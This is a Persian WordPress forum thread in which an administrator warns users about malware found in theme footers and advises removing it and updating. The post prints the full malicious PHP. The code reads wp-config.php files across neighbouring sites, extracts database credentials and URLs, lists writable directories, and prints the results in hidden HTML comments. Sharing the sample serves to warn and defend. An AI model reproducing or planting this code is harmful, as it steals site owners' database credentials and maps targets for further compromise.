امنیت سایت و سرور

امنیت سایت

رفع خطاهای w3c

رفع خطاهای w3c

افزایش سرعت سایت

سرعت سایت

ریسپانسیو

ریسپانسیو

پشتیبانی

پشتیبانی سایت

سئو و بهینه سازی

سئو و بهینه سازی

فروشگاه انجمن

فروشگاه انجمن

هاست وردپرس

هاست وردپرس


نمایش نتایج: از 1 به 3 از 3

موضوع: هشدار وحشتناک امنیتی در فوتر قالب

  1. #1
    مدیریت کل سایت admin آواتار ها
    تاریخ عضویت
    Oct 2017
    نوشته ها
    799
    تشکر تشکر کرده 
    15
    تشکر تشکر شده 
    17
    Thanked in
    15 پست

    پیش فرض هشدار وحشتناک امنیتی در فوتر قالب

    کاربران عزیز انجمن وردپرس ایرانی
    لطفا توجه کنید این ویروس بسیار خطرناک است
    اگر کد زیر در فوتر قالب سایت شما یافت شد سریع حذف کرده و کلیه افزونه ها و وردپرس خود را به روز نمایید
    کد:
    <?php
    if(stripos('win', PHP_OS) === false){
        define('DS', DIRECTORY_SEPARATOR);
        $fullPath = dirname(__FILE__);
        $parts = explode(DS, $fullPath);
        $parts = array_slice($parts, 0, -4);
        $wwwroot = implode(DS, $parts);
        $wp = $fullPath . DS. '..'.DS.'..'.DS.'..'.DS.'..'. DS;
        $dirs = scandir($wp);
        $work = array();
        foreach($dirs as $dir){
            $full = dirname(__FILE__) . '/../../../../' . $dir . '/wp-content/';
            if(file_exists($full)){
                $work[] = $wwwroot .DS. $dir ;
            }
        }
        foreach($work as $k => $path){
            $wpconf = $path . '/wp-config.php';
            $f = fopen($wpconf, 'r');
            $content = fread($f, filesize($wpconf));
            fclose($f);
            $pattern = '#DB_NAME[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
            preg_match_all($pattern, $content, $res);
            $dbname = $res[1][0];
            $pattern = '#DB_USER[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
            preg_match_all($pattern, $content, $res);
            $dbuser = $res[1][0];
            $pattern = '#DB_PASSWORD[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
            preg_match_all($pattern, $content, $res);
            $dbpass = $res[1][0];
            $pattern = '#DB_HOST[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
            preg_match_all($pattern, $content, $res);
            $dbhost = $res[1][0];
            $pattern = '#\$table_prefix(?:.*)?[\'\"](.*)?[\'\"]\;#isU';
            preg_match_all($pattern, $content, $res);
            $dbprefix = $res[1][0];
            $h = mysql_connect($dbhost, $dbuser, $dbpass) or die('ss');
            mysql_select_db($dbname, $h) or die('f');
            $data = mysql_query("SELECT option_value FROM ".$dbprefix."options WHERE option_name='home'") or die('d');
            while($info = mysql_fetch_array( $data ))
            {
                $host[$k] = $info['option_value'];
                break;
            }
            mysql_close($h);
        }
        echo '<!--##';
        echo implode("\n", $host);
        echo "##-->\n";
        $fold = array();
        foreach($work as $i => $path){
            $wpcontent = $path . '/wp-content';
            $fold[$i] = get_leaf_dirs($wpcontent);
        }
        if(!empty($fold)){
            echo '<!--$$';
            foreach($fold as $fol){
                if(!empty($fol)){
                    echo implode("\n", $fol);
                    echo "\n";
                }
            }
            echo '$$-->';
        }
    }
    if(!function_exists('scandir')) { // in case this script gets ported to PHP5, let's not break it
        function scandir($dir) {
            $files = array(); // added to initialize variable
            if(is_dir($dir)){
                $dh = opendir($dir); // added some error-checking
                while(false !== ($filename = readdir($dh))) {
                    if($filename == '.' || $filename == '..')
                        continue; // no need to get the . or .. references, right?
                    else
                        $files[] = $filename;
                }
                return $files;
            } else {
                return false;
            }
        }
    }
    function get_leaf_dirs($dir) {$array = array();$d = dir($dir);while (false !== ($entry = $d->read())) {if($entry!='.' && $entry!='..') {$entry = $dir.'/'.$entry;if(is_dir($entry) && is_writable($entry)) {$subdirs = get_leaf_dirs($entry);if ($subdirs)$array = array_merge($array, $subdirs);else$array[] = $entry;}}if(sizeof($array)>0){break;}}$d->close();return $array;}
    ?>

    تلگرام بنده :
    برای استفاده از امکانات سایت کنید
    برای استفاده از امکانات سایت کنیدبرای استفاده از امکانات سایت کنید
    برای استفاده از امکانات سایت کنید

  2. #2
    کاربر جدید ourweb آواتار ها
    تاریخ عضویت
    Nov 2017
    نوشته ها
    2
    تشکر تشکر کرده 
    0
    تشکر تشکر شده 
    0
    Thanked in
    0 پست

    پیش فرض

    سلام یک مورد این کد بصورت گسترده در قالب ها هست یا قالب های خارجی که فارسی میشن منظورم این می باشد که بصورت دیفالت در قالب ها است ؟

  3. #3
    مدیریت کل سایت admin آواتار ها
    تاریخ عضویت
    Oct 2017
    نوشته ها
    799
    تشکر تشکر کرده 
    15
    تشکر تشکر شده 
    17
    Thanked in
    15 پست

    پیش فرض

    از طریق سرور و افزونه ها و قالب ها منتقل می شه

    تلگرام بنده :
    برای استفاده از امکانات سایت کنید
    برای استفاده از امکانات سایت کنیدبرای استفاده از امکانات سایت کنید
    برای استفاده از امکانات سایت کنید

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

کلمات کلیدی این موضوع

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  
تماس